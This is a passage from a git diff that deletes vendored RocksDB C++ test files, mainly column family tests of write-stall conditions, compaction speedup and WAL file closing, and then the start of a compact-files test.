-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(3001);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(390);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(100);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage->set_l0_delay_trigger_count(100);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(101);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->set_l0_delay_trigger_count(0);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(300);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->set_l0_delay_trigger_count(101);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(200);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->set_l0_delay_trigger_count(0);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(0);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  mutable_cf_options.disable_auto_compactions = true;
-  dbfull()->TEST_write_controler().set_delayed_write_rate(kBaseRate);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage->set_l0_delay_trigger_count(50);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(0, GetDbDelayedWriteRate());
-  ASSERT_EQ(kBaseRate, dbfull()->TEST_write_controler().delayed_write_rate());
-
-  vstorage->set_l0_delay_trigger_count(60);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(300);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(0, GetDbDelayedWriteRate());
-  ASSERT_EQ(kBaseRate, dbfull()->TEST_write_controler().delayed_write_rate());
-
-  mutable_cf_options.disable_auto_compactions = false;
-  vstorage->set_l0_delay_trigger_count(70);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(500);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->set_l0_delay_trigger_count(71);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(501);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-}
-
-TEST_F(ColumnFamilyTest, CompactionSpeedupSingleColumnFamily) {
-  db_options_.max_background_compactions = 6;
-  Open({"default"});
-  ColumnFamilyData* cfd =
-      static_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())->cfd();
-
-  VersionStorageInfo* vstorage = cfd->current()->storage_info();
-
-  MutableCFOptions mutable_cf_options(column_family_options_);
-
-  // Speed up threshold = min(4 * 2, 4 + (36 - 4)/4) = 8
-  mutable_cf_options.level0_file_num_compaction_trigger = 4;
-  mutable_cf_options.level0_slowdown_writes_trigger = 36;
-  mutable_cf_options.level0_stop_writes_trigger = 50;
-  // Speedup threshold = 200 / 4 = 50
-  mutable_cf_options.soft_pending_compaction_bytes_limit = 200;
-  mutable_cf_options.hard_pending_compaction_bytes_limit = 2000;
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(40);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(50);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(300);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(45);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(7);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(9);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(6);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  // Speed up threshold = min(4 * 2, 4 + (12 - 4)/4) = 6
-  mutable_cf_options.level0_file_num_compaction_trigger = 4;
-  mutable_cf_options.level0_slowdown_writes_trigger = 16;
-  mutable_cf_options.level0_stop_writes_trigger = 30;
-
-  vstorage->set_l0_delay_trigger_count(5);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(7);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(3);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-}
-
-TEST_F(ColumnFamilyTest, WriteStallTwoColumnFamilies) {
-  const uint64_t kBaseRate = 810000u;
-  db_options_.delayed_write_rate = kBaseRate;
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyData* cfd =
-      static_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())->cfd();
-  VersionStorageInfo* vstorage = cfd->current()->storage_info();
-
-  ColumnFamilyData* cfd1 =
-      static_cast<ColumnFamilyHandleImpl*>(handles_[1])->cfd();
-  VersionStorageInfo* vstorage1 = cfd1->current()->storage_info();
-
-  MutableCFOptions mutable_cf_options(column_family_options_);
-  mutable_cf_options.level0_slowdown_writes_trigger = 20;
-  mutable_cf_options.level0_stop_writes_trigger = 10000;
-  mutable_cf_options.soft_pending_compaction_bytes_limit = 200;
-  mutable_cf_options.hard_pending_compaction_bytes_limit = 2000;
-
-  MutableCFOptions mutable_cf_options1 = mutable_cf_options;
-  mutable_cf_options1.soft_pending_compaction_bytes_limit = 500;
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(50);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(201);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(600);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(70);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(800);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(300);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(700);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(500);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(600);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-}
-
-TEST_F(ColumnFamilyTest, CompactionSpeedupTwoColumnFamilies) {
-  db_options_.max_background_compactions = 6;
-  column_family_options_.soft_pending_compaction_bytes_limit = 200;
-  column_family_options_.hard_pending_compaction_bytes_limit = 2000;
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyData* cfd =
-      static_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())->cfd();
-  VersionStorageInfo* vstorage = cfd->current()->storage_info();
-
-  ColumnFamilyData* cfd1 =
-      static_cast<ColumnFamilyHandleImpl*>(handles_[1])->cfd();
-  VersionStorageInfo* vstorage1 = cfd1->current()->storage_info();
-
-  MutableCFOptions mutable_cf_options(column_family_options_);
-  // Speed up threshold = min(4 * 2, 4 + (36 - 4)/4) = 8
-  mutable_cf_options.level0_file_num_compaction_trigger = 4;
-  mutable_cf_options.level0_slowdown_writes_trigger = 36;
-  mutable_cf_options.level0_stop_writes_trigger = 30;
-  // Speedup threshold = 200 / 4 = 50
-  mutable_cf_options.soft_pending_compaction_bytes_limit = 200;
-  mutable_cf_options.hard_pending_compaction_bytes_limit = 2000;
-
-  MutableCFOptions mutable_cf_options1 = mutable_cf_options;
-  mutable_cf_options1.level0_slowdown_writes_trigger = 16;
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(40);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(60);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(30);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(70);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(20);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(3);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(9);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage1->set_l0_delay_trigger_count(2);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(0);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(ColumnFamilyTest, FlushCloseWALFiles) {
-  SpecialEnv env(Env::Default());
-  db_options_.env = &env;
-  db_options_.max_background_flushes = 1;
-  column_family_options_.memtable_factory.reset(new SpecialSkipListFactory(2));
-  Open();
-  CreateColumnFamilies({"one"});
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(0, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBImpl::BGWorkFlush:done", "FlushCloseWALFiles:0"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Block flush jobs from running
-  test::SleepingBackgroundTask sleeping_task;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-
-  WriteOptions wo;
-  wo.sync = true;
-  ASSERT_OK(db_->Put(wo, handles_[1], "fodor", "mirko"));
-
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-  TEST_SYNC_POINT("FlushCloseWALFiles:0");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-
-  Reopen();
-  ASSERT_EQ("mirko", Get(0, "fodor"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  db_options_.env = env_;
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // WaitForFlush() is not supported
-TEST_F(ColumnFamilyTest, IteratorCloseWALFile1) {
-  SpecialEnv env(Env::Default());
-  db_options_.env = &env;
-  db_options_.max_background_flushes = 1;
-  column_family_options_.memtable_factory.reset(new SpecialSkipListFactory(2));
-  Open();
-  CreateColumnFamilies({"one"});
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  // Create an iterator holding the current super version.
-  Iterator* it = db_->NewIterator(ReadOptions(), handles_[1]);
-  // A flush will make `it` hold the last reference of its super version.
-  Flush(1);
-
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(0, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-
-  // Flush jobs will close previous WAL files after finishing. By
-  // block flush jobs from running, we trigger a condition where
-  // the iterator destructor should close the WAL files.
-  test::SleepingBackgroundTask sleeping_task;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-
-  WriteOptions wo;
-  wo.sync = true;
-  ASSERT_OK(db_->Put(wo, handles_[1], "fodor", "mirko"));
-
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-  // Deleting the iterator will clear its super version, triggering
-  // closing all files
-  delete it;
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-  WaitForFlush(1);
-
-  Reopen();
-  ASSERT_EQ("mirko", Get(0, "fodor"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  db_options_.env = env_;
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, IteratorCloseWALFile2) {
-  SpecialEnv env(Env::Default());
-  // Allow both of flush and purge job to schedule.
-  env.SetBackgroundThreads(2, Env::HIGH);
-  db_options_.env = &env;
-  db_options_.max_background_flushes = 1;
-  column_family_options_.memtable_factory.reset(new SpecialSkipListFactory(2));
-  Open();
-  CreateColumnFamilies({"one"});
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  // Create an iterator holding the current super version.
-  ReadOptions ro;
-  ro.background_purge_on_iterator_cleanup = true;
-  Iterator* it = db_->NewIterator(ro, handles_[1]);
-  // A flush will make `it` hold the last reference of its super version.
-  Flush(1);
-
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(0, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"ColumnFamilyTest::IteratorCloseWALFile2:0",
-       "DBImpl::BGWorkPurge:start"},
-      {"ColumnFamilyTest::IteratorCloseWALFile2:2",
-       "DBImpl::BackgroundCallFlush:start"},
-      {"DBImpl::BGWorkPurge:end", "ColumnFamilyTest::IteratorCloseWALFile2:1"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  WriteOptions wo;
-  wo.sync = true;
-  ASSERT_OK(db_->Put(wo, handles_[1], "fodor", "mirko"));
-
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-  // Deleting the iterator will clear its super version, triggering
-  // closing all files
-  delete it;
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:0");
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:1");
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:2");
-  WaitForFlush(1);
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  Reopen();
-  ASSERT_EQ("mirko", Get(0, "fodor"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  db_options_.env = env_;
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // TEST functions are not supported in lite
-TEST_F(ColumnFamilyTest, ForwardIteratorCloseWALFile) {
-  SpecialEnv env(Env::Default());
-  // Allow both of flush and purge job to schedule.
-  env.SetBackgroundThreads(2, Env::HIGH);
-  db_options_.env = &env;
-  db_options_.max_background_flushes = 1;
-  column_family_options_.memtable_factory.reset(new SpecialSkipListFactory(3));
-  column_family_options_.level0_file_num_compaction_trigger = 2;
-  Open();
-  CreateColumnFamilies({"one"});
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodar2", "mirko"));
-  Flush(1);
-
-  // Create an iterator holding the current super version, as well as
-  // the SST file just flushed.
-  ReadOptions ro;
-  ro.tailing = true;
-  ro.background_purge_on_iterator_cleanup = true;
-  Iterator* it = db_->NewIterator(ro, handles_[1]);
-  // A flush will make `it` hold the last reference of its super version.
-
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodar2", "mirko"));
-  Flush(1);
-
-  WaitForCompaction();
-
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(0, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"ColumnFamilyTest::IteratorCloseWALFile2:0",
-       "DBImpl::BGWorkPurge:start"},
-      {"ColumnFamilyTest::IteratorCloseWALFile2:2",
-       "DBImpl::BackgroundCallFlush:start"},
-      {"DBImpl::BGWorkPurge:end", "ColumnFamilyTest::IteratorCloseWALFile2:1"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  WriteOptions wo;
-  wo.sync = true;
-  ASSERT_OK(db_->Put(wo, handles_[1], "fodor", "mirko"));
-
-  env.delete_count_.store(0);
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-  // Deleting the iterator will clear its super version, triggering
-  // closing all files
-  it->Seek("");
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-  ASSERT_EQ(0, env.delete_count_.load());
-
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:0");
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:1");
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-  ASSERT_EQ(1, env.delete_count_.load());
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:2");
-  WaitForFlush(1);
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-  ASSERT_EQ(1, env.delete_count_.load());
-
-  delete it;
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  Reopen();
-  ASSERT_EQ("mirko", Get(0, "fodor"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  db_options_.env = env_;
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-// Disable on windows because SyncWAL requires env->IsSyncThreadSafe()
-// to return true which is not so in unbuffered mode.
-#ifndef OS_WIN
-TEST_F(ColumnFamilyTest, LogSyncConflictFlush) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-
-  Put(0, "", "");
-  Put(1, "foo", "bar");
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::SyncWAL:BeforeMarkLogsSynced:1",
-        "ColumnFamilyTest::LogSyncConflictFlush:1"},
-       {"ColumnFamilyTest::LogSyncConflictFlush:2",
-        "DBImpl::SyncWAL:BeforeMarkLogsSynced:2"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([&] { db_->SyncWAL(); });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::LogSyncConflictFlush:1");
-  Flush(1);
-  Put(1, "foo", "bar");
-  Flush(1);
-
-  TEST_SYNC_POINT("ColumnFamilyTest::LogSyncConflictFlush:2");
-
-  thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  Close();
-}
-#endif
-
-// this test is placed here, because the infrastructure for Column Family
-// test is being used to ensure a roll of wal files.
-// Basic idea is to test that WAL truncation is being detected and not
-// ignored
-TEST_F(ColumnFamilyTest, DISABLED_LogTruncationTest) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-
-  Build(0, 100);
-
-  // Flush the 0th column family to force a roll of the wal log
-  Flush(0);
-
-  // Add some more entries
-  Build(100, 100);
-
-  std::vector<std::string> filenames;
-  ASSERT_OK(env_->GetChildren(dbname_, &filenames));
-
-  // collect wal files
-  std::vector<std::string> logfs;
-  for (size_t i = 0; i < filenames.size(); i++) {
-    uint64_t number;
-    FileType type;
-    if (!(ParseFileName(filenames[i], &number, &type))) continue;
-
-    if (type != kLogFile) continue;
-
-    logfs.push_back(filenames[i]);
-  }
-
-  std::sort(logfs.begin(), logfs.end());
-  ASSERT_GE(logfs.size(), 2);
-
-  // Take the last but one file, and truncate it
-  std::string fpath = dbname_ + "/" + logfs[logfs.size() - 2];
-  std::vector<std::string> names_save = names_;
-
-  uint64_t fsize;
-  ASSERT_OK(env_->GetFileSize(fpath, &fsize));
-  ASSERT_GT(fsize, 0);
-
-  Close();
-
-  std::string backup_logs = dbname_ + "/backup_logs";
-  std::string t_fpath = backup_logs + "/" + logfs[logfs.size() - 2];
-
-  ASSERT_OK(env_->CreateDirIfMissing(backup_logs));
-  // Not sure how easy it is to make this data driven.
-  // need to read back the WAL file and truncate last 10
-  // entries
-  CopyFile(fpath, t_fpath, fsize - 9180);
-
-  ASSERT_OK(env_->DeleteFile(fpath));
-  ASSERT_OK(env_->RenameFile(t_fpath, fpath));
-
-  db_options_.wal_recovery_mode = WALRecoveryMode::kPointInTimeRecovery;
-
-  OpenReadOnly(names_save);
-
-  CheckMissed();
-
-  Close();
-
-  Open(names_save);
-
-  CheckMissed();
-
-  Close();
-
-  // cleanup
-  env_->DeleteDir(backup_logs);
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/compact_files_test.cc b/thirdparty/rocksdb/db/compact_files_test.cc
deleted file mode 100644
index 5aad611..0000000
--- a/thirdparty/rocksdb/db/compact_files_test.cc
+++ /dev/null
@@ -1,328 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <mutex>
-#include <string>
-#include <thread>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class CompactFilesTest : public testing::Test {
- public:
-  CompactFilesTest() {
-    env_ = Env::Default();
-    db_name_ = test::TmpDir(env_) + "/compact_files_test";
-  }
-
-  std::string db_name_;
-  Env* env_;
-};
-
-// A class which remembers the name of each flushed file.
-class FlushedFileCollector : public EventListener {
- public:
-  FlushedFileCollector() {}
-  ~FlushedFileCollector() {}
-
-  virtual void OnFlushCompleted(
-      DB* db, const FlushJobInfo& info) override {
-    std::lock_guard<std::mutex> lock(mutex_);
-    flushed_files_.push_back(info.file_path);
-  }
-
-  std::vector<std::string> GetFlushedFiles() {
-    std::lock_guard<std::mutex> lock(mutex_);
-    std::vector<std::string> result;
-    for (auto fname : flushed_files_) {
-      result.push_back(fname);
-    }
-    return result;
-  }
-  void ClearFlushedFiles() {
-    std::lock_guard<std::mutex> lock(mutex_);
-    flushed_files_.clear();
-  }
-
- private:
-  std::vector<std::string> flushed_files_;
-  std::mutex mutex_;
-};
-
-TEST_F(CompactFilesTest, L0ConflictsFiles) {
-  Options options;
-  // to trigger compaction more easily
-  const int kWriteBufferSize = 10000;
-  const int kLevel0Trigger = 2;
-  options.create_if_missing = true;
-  options.compaction_style = kCompactionStyleLevel;
-  // Small slowdown and stop trigger for experimental purpose.
-  options.level0_slowdown_writes_trigger = 20;
-  options.level0_stop_writes_trigger = 20;
-  options.level0_stop_writes_trigger = 20;
-  options.write_buffer_size = kWriteBufferSize;
-  options.level0_file_num_compaction_trigger = kLevel0Trigger;
-  options.compression = kNoCompression;
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  assert(s.ok());
-  assert(db);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"CompactFilesImpl:0", "BackgroundCallCompaction:0"},
-      {"BackgroundCallCompaction:1", "CompactFilesImpl:1"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // create couple files
-  // Background compaction starts and waits in BackgroundCallCompaction:0
-  for (int i = 0; i < kLevel0Trigger * 4; ++i) {
-    db->Put(WriteOptions(), ToString(i), "");
-    db->Put(WriteOptions(), ToString(100 - i), "");
-    db->Flush(FlushOptions());
-  }
-
-  rocksdb::ColumnFamilyMetaData meta;
-  db->GetColumnFamilyMetaData(&meta);
-  std::string file1;
-  for (auto& file : meta.levels[0].files) {
